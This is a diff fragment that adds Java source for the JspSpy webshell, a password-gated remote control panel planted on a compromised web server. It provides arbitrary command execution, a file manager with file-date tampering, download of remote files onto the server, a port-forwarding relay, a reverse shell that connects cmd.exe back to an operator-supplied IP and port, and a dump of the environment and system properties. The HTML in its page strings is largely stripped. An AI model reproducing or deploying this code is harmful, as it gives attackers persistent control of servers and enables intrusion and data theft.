    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
